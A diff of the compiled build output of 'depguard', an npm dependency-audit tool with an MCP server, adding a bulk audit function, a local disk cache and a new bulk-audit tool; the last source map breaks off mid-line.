+    const results = [];
+    // Process in batches to respect rate limits
+    for (let i = 0; i < packages.length; i += concurrency) {
+        const batch = packages.slice(i, i + concurrency);
+        const batchResults = await Promise.all(batch.map(name => audit(name, targetLicense, fetcher)));
+        results.push(...batchResults);
+    }
+    const summary = {
+        critical: 0,
+        high: 0,
+        moderate: 0,
+        low: 0,
+    };
+    let vulnerable = 0;
+    let deprecated = 0;
+    for (const r of results) {
+        summary.critical += r.vulnerabilities.critical;
+        summary.high += r.vulnerabilities.high;
+        summary.moderate += r.vulnerabilities.moderate;
+        summary.low += r.vulnerabilities.low;
+        if (r.vulnerabilities.total > 0)
+            vulnerable++;
+        if (r.deprecated)
+            deprecated++;
+    }
+    return {
+        total: results.length,
+        clean: results.length - vulnerable,
+        vulnerable,
+        deprecated,
+        results,
+        summary,
+    };
+}
+//# sourceMappingURL=bulk.js.map

package/dist/bulk.js.map

@@ -0,0 +1 @@
+{"version":3,"file":"bulk.js","sourceRoot":"","sources":["../src/bulk.ts"],"names":[],"mappings":"AACA,OAAO,EAAE,KAAK,EAAE,MAAM,YAAY,CAAA;AAwBlC;;;GAGG;AACH,MAAM,CAAC,KAAK,UAAU,SAAS,CAC7B,QAAkB,EAClB,UAA4B,EAAE;IAE9B,MAAM,EACJ,aAAa,GAAG,KAAK,EACrB,WAAW,GAAG,CAAC,EACf,OAAO,GAAG,UAAU,CAAC,KAAK,GAC3B,GAAG,OAAO,CAAA;IAEX,IAAI,QAAQ,CAAC,MAAM,KAAK,CAAC,EAAE,CAAC;QAC1B,OAAO,EAAE,KAAK,EAAE,CAAC,EAAE,KAAK,EAAE,CAAC,EAAE,UAAU,EAAE,CAAC,EAAE,UAAU,EAAE,CAAC,EAAE,OAAO,EAAE,EAAE,EAAE,OAAO,EAAE,EAAE,QAAQ,EAAE,CAAC,EAAE,IAAI,EAAE,CAAC,EAAE,QAAQ,EAAE,CAAC,EAAE,GAAG,EAAE,CAAC,EAAE,EAAE,CAAA;IAClI,CAAC;IAED,MAAM,OAAO,GAAkB,EAAE,CAAA;IAEjC,4CAA4C;IAC5C,KAAK,IAAI,CAAC,GAAG,CAAC,EAAE,CAAC,GAAG,QAAQ,CAAC,MAAM,EAAE,CAAC,IAAI,WAAW,EAAE,CAAC;QACtD,MAAM,KAAK,GAAG,QAAQ,CAAC,KAAK,CAAC,CAAC,EAAE,CAAC,GAAG,WAAW,CAAC,CAAA;QAChD,MAAM,YAAY,GAAG,MAAM,OAAO,CAAC,GAAG,CACpC,KAAK,CAAC,GAAG,CAAC,IAAI,CAAC,EAAE,CAAC,KAAK,CAAC,IAAI,EAAE,aAAa,EAAE,OAAO,CAAC,CAAC,CACvD,CAAA;QACD,OAAO,CAAC,IAAI,CAAC,GAAG,YAAY,CAAC,CAAA;IAC/B,CAAC;IAED,MAAM,OAAO,GAAG;QACd,QAAQ,EAAE,CAAC;QACX,IAAI,EAAE,CAAC;QACP,QAAQ,EAAE,CAAC;QACX,GAAG,EAAE,CAAC;KACP,CAAA;IAED,IAAI,UAAU,GAAG,CAAC,CAAA;IAClB,IAAI,UAAU,GAAG,CAAC,CAAA;IAElB,KAAK,MAAM,CAAC,IAAI,OAAO,EAAE,CAAC;QACxB,OAAO,CAAC,QAAQ,IAAI,CAAC,CAAC,eAAe,CAAC,QAAQ,CAAA;QAC9C,OAAO,CAAC,IAAI,IAAI,CAAC,CAAC,eAAe,CAAC,IAAI,CAAA;QACtC,OAAO,CAAC,QAAQ,IAAI,CAAC,CAAC,eAAe,CAAC,QAAQ,CAAA;QAC9C,OAAO,CAAC,GAAG,IAAI,CAAC,CAAC,eAAe,CAAC,GAAG,CAAA;QACpC,IAAI,CAAC,CAAC,eAAe,CAAC,KAAK,GAAG,CAAC;YAAE,UAAU,EAAE,CAAA;QAC7C,IAAI,CAAC,CAAC,UAAU;YAAE,UAAU,EAAE,CAAA;IAChC,CAAC;IAED,OAAO;QACL,KAAK,EAAE,OAAO,CAAC,MAAM;QACrB,KAAK,EAAE,OAAO,CAAC,MAAM,GAAG,UAAU;QAClC,UAAU;QACV,UAAU;QACV,OAAO;QACP,OAAO;KACR,CAAA;AACH,CAAC"}

package/dist/disk-cache.d.ts

@@ -0,0 +1,11 @@
+/** Disable disk cache (used in tests) */
+export declare function disableDiskCache(): void;
+/** Enable disk cache */
+export declare function enableDiskCache(): void;
+/** Read from disk cache. Returns null if missing or expired. */
+export declare function diskGet<T>(key: string): T | null;
+/** Write to disk cache with TTL (default 24h). */
+export declare function diskSet<T>(key: string, data: T, ttl?: number): void;
+/** Remove expired cache files from disk. */
+export declare function cleanupDiskCache(): number;
+//# sourceMappingURL=disk-cache.d.ts.map

package/dist/disk-cache.d.ts.map

@@ -0,0 +1 @@
+{"version":3,"file":"disk-cache.d.ts","sourceRoot":"","sources":["../src/disk-cache.ts"],"names":[],"mappings":"AAUA,yCAAyC;AACzC,wBAAgB,gBAAgB,IAAI,IAAI,CAEvC;AAED,wBAAwB;AACxB,wBAAgB,eAAe,IAAI,IAAI,CAEtC;AAsBD,gEAAgE;AAChE,wBAAgB,OAAO,CAAC,CAAC,EAAE,GAAG,EAAE,MAAM,GAAG,CAAC,GAAG,IAAI,CAiBhD;AAED,kDAAkD;AAClD,wBAAgB,OAAO,CAAC,CAAC,EAAE,GAAG,EAAE,MAAM,EAAE,IAAI,EAAE,CAAC,EAAE,GAAG,SAAc,GAAG,IAAI,CAaxE;AAED,4CAA4C;AAC5C,wBAAgB,gBAAgB,IAAI,MAAM,CAuBzC"}

package/dist/disk-cache.js

@@ -0,0 +1,92 @@
+import { readFileSync, writeFileSync, mkdirSync, existsSync, readdirSync, unlinkSync } from 'node:fs';
+import { join } from 'node:path';
+import { homedir } from 'node:os';
+import { createHash } from 'node:crypto';
+const CACHE_DIR = join(homedir(), '.depguard', 'cache');
+const DEFAULT_TTL = 24 * 60 * 60 * 1000; // 24 hours
+let diskCacheEnabled = true;
+/** Disable disk cache (used in tests) */
+export function disableDiskCache() {
+    diskCacheEnabled = false;
+}
+/** Enable disk cache */
+export function enableDiskCache() {
+    diskCacheEnabled = true;
+}
+function ensureCacheDir() {
+    if (!existsSync(CACHE_DIR)) {
+        mkdirSync(CACHE_DIR, { recursive: true });
+    }
+}
+function cacheKey(key) {
+    return createHash('sha256').update(key).digest('hex').slice(0, 16);
+}
+function cachePath(key) {
+    return join(CACHE_DIR, `${cacheKey(key)}.json`);
+}
+/** Read from disk cache. Returns null if missing or expired. */
+export function diskGet(key) {
+    if (!diskCacheEnabled)
+        return null;
+    try {
+        const path = cachePath(key);
+        if (!existsSync(path))
+            return null;
+        const raw = readFileSync(path, 'utf-8');
+        const entry = JSON.parse(raw);
+        if (Date.now() > entry.expiresAt) {
+            return null;
+        }
+        return entry.data;
+    }
+    catch {
+        return null;
+    }
+}
+/** Write to disk cache with TTL (default 24h). */
+export function diskSet(key, data, ttl = DEFAULT_TTL) {
+    if (!diskCacheEnabled)
+        return;
+    try {
+        ensureCacheDir();
+        const entry = {
+            data,
+            expiresAt: Date.now() + ttl,
+            createdAt: new Date().toISOString(),
+        };
+        writeFileSync(cachePath(key), JSON.stringify(entry), 'utf-8');
+    }
+    catch {
+        // Silently fail — cache is best-effort
+    }
+}
+/** Remove expired cache files from disk. */
+export function cleanupDiskCache() {
+    if (!diskCacheEnabled)
+        return 0;
+    try {
+        if (!existsSync(CACHE_DIR))
+            return 0;
+        const files = readdirSync(CACHE_DIR).filter(f => f.endsWith('.json'));
+        let removed = 0;
+        for (const file of files) {
+            try {
+                const path = join(CACHE_DIR, file);
+                const raw = readFileSync(path, 'utf-8');
+                const entry = JSON.parse(raw);
+                if (Date.now() > entry.expiresAt) {
+                    unlinkSync(path);
+                    removed++;
+                }
+            }
+            catch {
+                // Skip corrupted files
+            }
+        }
+        return removed;
+    }
+    catch {
+        return 0;
+    }
+}
+//# sourceMappingURL=disk-cache.js.map

package/dist/disk-cache.js.map

@@ -0,0 +1 @@
+{"version":3,"file":"disk-cache.js","sourceRoot":"","sources":["../src/disk-cache.ts"],"names":[],"mappings":"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"}

package/dist/index.d.ts

@@ -1,10 +1,13 @@
 export { audit } from './audit.js';
+export { analyzeScripts } from './script-analysis.js';
+export { auditBulk } from './bulk.js';
 export { search } from './search.js';
 export { score } from './scorer.js';
 export { shouldUse } from './advisor.js';
 export { checkLicenseCompatibility, knownLicenses } from './license.js';
-export { clearCache } from './registry.js';
+export { clearCache, fetchGitHubAdvisories } from './registry.js';
 export { calculateSavings, estimateTokens } from './tokens.js';
-export type { AdvisorOptions, AuditReport, CacheEntry, FetchFn, LicenseCompatibility, NpmAdvisory, NpmDownloadsResponse, NpmPackageData, NpmSearchResult, NpmVersionData, Recommendation, ScoreResult, ScoreWeights, SearchEntry, SearchOptions, VulnerabilitySummary, } from './types.js';
+export type { AdvisorOptions, AuditReport, CacheEntry, FetchFn, GitHubAdvisory, LicenseCompatibility, NpmAdvisory, ScriptAnalysis, ScriptRisk, NpmDownloadsResponse, NpmPackageData, NpmSearchResult, NpmVersionData, Recommendation, ScoreResult, ScoreWeights, SearchEntry, SearchOptions, VulnerabilitySummary, } from './types.js';
 export type { TokenSavings } from './tokens.js';
+export type { BulkAuditReport, BulkAuditOptions } from './bulk.js';
 //# sourceMappingURL=index.d.ts.map

package/dist/index.d.ts.map

@@ -1 +1 @@
-{"version":3,"file":"index.d.ts","sourceRoot":"","sources":["../src/index.ts"],"names":[],"mappings":"AAAA,OAAO,EAAE,KAAK,EAAE,MAAM,YAAY,CAAA;AAClC,OAAO,EAAE,MAAM,EAAE,MAAM,aAAa,CAAA;AACpC,OAAO,EAAE,KAAK,EAAE,MAAM,aAAa,CAAA;AACnC,OAAO,EAAE,SAAS,EAAE,MAAM,cAAc,CAAA;AACxC,OAAO,EAAE,yBAAyB,EAAE,aAAa,EAAE,MAAM,cAAc,CAAA;AACvE,OAAO,EAAE,UAAU,EAAE,MAAM,eAAe,CAAA;AAC1C,OAAO,EAAE,gBAAgB,EAAE,cAAc,EAAE,MAAM,aAAa,CAAA;AAC9D,YAAY,EACV,cAAc,EACd,WAAW,EACX,UAAU,EACV,OAAO,EACP,oBAAoB,EACpB,WAAW,EACX,oBAAoB,EACpB,cAAc,EACd,eAAe,EACf,cAAc,EACd,cAAc,EACd,WAAW,EACX,YAAY,EACZ,WAAW,EACX,aAAa,EACb,oBAAoB,GACrB,MAAM,YAAY,CAAA;AACnB,YAAY,EAAE,YAAY,EAAE,MAAM,aAAa,CAAA"}
+{"version":3,"file":"index.d.ts","sourceRoot":"","sources":["../src/index.ts"],"names":[],"mappings":"AAAA,OAAO,EAAE,KAAK,EAAE,MAAM,YAAY,CAAA;AAClC,OAAO,EAAE,cAAc,EAAE,MAAM,sBAAsB,CAAA;AACrD,OAAO,EAAE,SAAS,EAAE,MAAM,WAAW,CAAA;AACrC,OAAO,EAAE,MAAM,EAAE,MAAM,aAAa,CAAA;AACpC,OAAO,EAAE,KAAK,EAAE,MAAM,aAAa,CAAA;AACnC,OAAO,EAAE,SAAS,EAAE,MAAM,cAAc,CAAA;AACxC,OAAO,EAAE,yBAAyB,EAAE,aAAa,EAAE,MAAM,cAAc,CAAA;AACvE,OAAO,EAAE,UAAU,EAAE,qBAAqB,EAAE,MAAM,eAAe,CAAA;AACjE,OAAO,EAAE,gBAAgB,EAAE,cAAc,EAAE,MAAM,aAAa,CAAA;AAC9D,YAAY,EACV,cAAc,EACd,WAAW,EACX,UAAU,EACV,OAAO,EACP,cAAc,EACd,oBAAoB,EACpB,WAAW,EACX,cAAc,EACd,UAAU,EACV,oBAAoB,EACpB,cAAc,EACd,eAAe,EACf,cAAc,EACd,cAAc,EACd,WAAW,EACX,YAAY,EACZ,WAAW,EACX,aAAa,EACb,oBAAoB,GACrB,MAAM,YAAY,CAAA;AACnB,YAAY,EAAE,YAAY,EAAE,MAAM,aAAa,CAAA;AAC/C,YAAY,EAAE,eAAe,EAAE,gBAAgB,EAAE,MAAM,WAAW,CAAA"}

package/dist/index.js

@@ -1,8 +1,10 @@
 export { audit } from './audit.js';
+export { analyzeScripts } from './script-analysis.js';
+export { auditBulk } from './bulk.js';
 export { search } from './search.js';
 export { score } from './scorer.js';
 export { shouldUse } from './advisor.js';
 export { checkLicenseCompatibility, knownLicenses } from './license.js';
-export { clearCache } from './registry.js';
+export { clearCache, fetchGitHubAdvisories } from './registry.js';
 export { calculateSavings, estimateTokens } from './tokens.js';
 //# sourceMappingURL=index.js.map

package/dist/index.js.map

@@ -1 +1 @@
-{"version":3,"file":"index.js","sourceRoot":"","sources":["../src/index.ts"],"names":[],"mappings":"AAAA,OAAO,EAAE,KAAK,EAAE,MAAM,YAAY,CAAA;AAClC,OAAO,EAAE,MAAM,EAAE,MAAM,aAAa,CAAA;AACpC,OAAO,EAAE,KAAK,EAAE,MAAM,aAAa,CAAA;AACnC,OAAO,EAAE,SAAS,EAAE,MAAM,cAAc,CAAA;AACxC,OAAO,EAAE,yBAAyB,EAAE,aAAa,EAAE,MAAM,cAAc,CAAA;AACvE,OAAO,EAAE,UAAU,EAAE,MAAM,eAAe,CAAA;AAC1C,OAAO,EAAE,gBAAgB,EAAE,cAAc,EAAE,MAAM,aAAa,CAAA"}
+{"version":3,"file":"index.js","sourceRoot":"","sources":["../src/index.ts"],"names":[],"mappings":"AAAA,OAAO,EAAE,KAAK,EAAE,MAAM,YAAY,CAAA;AAClC,OAAO,EAAE,cAAc,EAAE,MAAM,sBAAsB,CAAA;AACrD,OAAO,EAAE,SAAS,EAAE,MAAM,WAAW,CAAA;AACrC,OAAO,EAAE,MAAM,EAAE,MAAM,aAAa,CAAA;AACpC,OAAO,EAAE,KAAK,EAAE,MAAM,aAAa,CAAA;AACnC,OAAO,EAAE,SAAS,EAAE,MAAM,cAAc,CAAA;AACxC,OAAO,EAAE,yBAAyB,EAAE,aAAa,EAAE,MAAM,cAAc,CAAA;AACvE,OAAO,EAAE,UAAU,EAAE,qBAAqB,EAAE,MAAM,eAAe,CAAA;AACjE,OAAO,EAAE,gBAAgB,EAAE,cAAc,EAAE,MAAM,aAAa,CAAA"}

package/dist/mcp.js

@@ -7,14 +7,16 @@
  *
  * Zero dependencies — implements the MCP subset needed for tool serving.
  */
+import { cleanupDiskCache } from './disk-cache.js';
 import { audit } from './audit.js';
+import { auditBulk } from './bulk.js';
 import { search } from './search.js';
 import { score } from './scorer.js';
 import { shouldUse } from './advisor.js';
 import { calculateSavings } from './tokens.js';
 const SERVER_INFO = {
     name: 'depguard',
-    version: '1.1.2',
+    version: '1.2.1',
 };
 const TOOLS = [
     {
@@ -54,6 +56,24 @@ const TOOLS = [
             required: ['name'],
         },
     },
+    {
+        name: 'depguard_audit_bulk',
+        description: 'Audit multiple npm packages in a single call. Accepts a list of package names or a full dependencies object from package.json. Returns a consolidated report with vulnerability summary.',
+        inputSchema: {
+            type: 'object',
+            properties: {
+                packages: {
+                    description: 'Array of package names OR a dependencies object from package.json (e.g. {"react": "^18.0.0", "express": "^4.0.0"})',
+                    oneOf: [
+                        { type: 'array', items: { type: 'string' } },
+                        { type: 'object' },
+                    ],
+                },
+                targetLicense: { type: 'string', description: 'Project license for compatibility check (default: MIT)' },
+            },
+            required: ['packages'],
+        },
+    },
     {
         name: 'depguard_should_use',
         description: 'Given an intent (e.g. "date formatting"), search packages, audit top candidates, and recommend install vs write-from-scratch.',
@@ -120,6 +140,22 @@ async function handleRequest(req) {
                         });
                         return success(req.id, toolResult('depguard_score', result));
                     }
+                    case 'depguard_audit_bulk': {
+                        const raw = args.packages;
+                        // Accept either an array of names or a dependencies object
+                        const packageNames = Array.isArray(raw)
+                            ? raw
+                            : typeof raw === 'object' && raw !== null
+                                ? Object.keys(raw)
+                                : [];
+                        if (packageNames.length === 0) {
+                            return error(req.id, -32602, 'packages must be a non-empty array or dependencies object');
+                        }
+                        const result = await auditBulk(packageNames, {
+                            targetLicense: args.targetLicense ?? 'MIT',
+                        });
+                        return success(req.id, toolResult('depguard_audit_bulk', result, packageNames.length));
+                    }
                     case 'depguard_should_use': {
                         const limit = args.limit ?? 5;
                         const result = await shouldUse(args.intent, {
@@ -149,6 +185,8 @@ async function handleRequest(req) {
     }
 }
 async function main() {
+    // Clean up expired cache files on startup
+    cleanupDiskCache();
     const { createInterface } = await import('node:readline');
     const rl = createInterface({ input: process.stdin });
     for await (const line of rl) {

package/dist/mcp.js.map

@@ -1 +1 @@
-{"version":3,"file":"mcp.js","sourceRoot":"","sources":["../src/mcp.ts"],"names":[],"mappings":"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